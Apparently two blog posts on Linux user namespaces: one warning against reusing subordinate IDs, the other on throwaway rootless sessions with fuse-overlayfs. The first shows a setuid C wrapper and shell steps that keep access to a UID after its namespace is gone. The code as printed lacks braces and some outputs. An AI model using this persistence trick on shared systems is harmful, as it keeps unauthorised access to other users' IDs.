SUID binaries from a user namespace

Additional IDs that are allocated to a user through /etc/subuid and /etc/subgid must be considered as permanently allocated and never reused for any other user.

Even if the container/user namespace where they are used is destroyed, it is possible to forge a SUID binary that will keep access to any ID present in the user namespace.

This simple C program is enough to keep access to an UID that was allocated to a user namespace:

#define _GNU_SOURCE
#include <unistd.h>
#include <sys/types.h>

int main (int argc, char **argv)
	uid_t u = geteuid ();
	setresuid (u, u, u);
	execvp (argv[1], argv + 1);

with that in place, from the user namespace:

$ id -u # ID 0 is mapped to ID 1000 in the host
$ gcc program.c -o keep_id
$ chown 10:10 keep_id
$ chmod +s keep_id

even once the user namespace is destroyed and possibly the range of allocated subids changed for the user, from the host we can still get access to whatever ID was allocated to the user 10 in the user namespace:

$ id -u
$ ls -l keep_id
-rwsr-sr-x. 1 100009 100009 18432 Jan 10 22:23 keep_id
$ ./keep_id id -u

disposable rootless sessions

would be nice to have a way to “fork” the current session and be able to revert all the changes done, without any leftover on the file system.

Playing with fuse-overlayfs, a FUSE implementation of the overlay file system and thus usable by rootless users, I realized how that is so easy to achieve, just by setting the overlay lowerdir to ‘/’ and using a temporary directory for the upper dir.

The upper dir, where all the overlay changes are written can be deleted once the session is over, or re-used to get back the created session.

This simple setup also enables the use case of an unprivileged user that can install packages using the existing system as a base. With few caveats (e.g. /var/log must be writeable) I managed to run dnf and install a few packages on top of my system without the need of the root user. Obviously the rest of the system didn’t notice any change, as these files were visible only from the fuse-overlayfs mount and the mount namespace using it.

Perhaps a tool could help managing similar setups. The biggest problem is in how to address the assumption the lower layer won’t change, or at least not enough to cause any breakage in the layered session.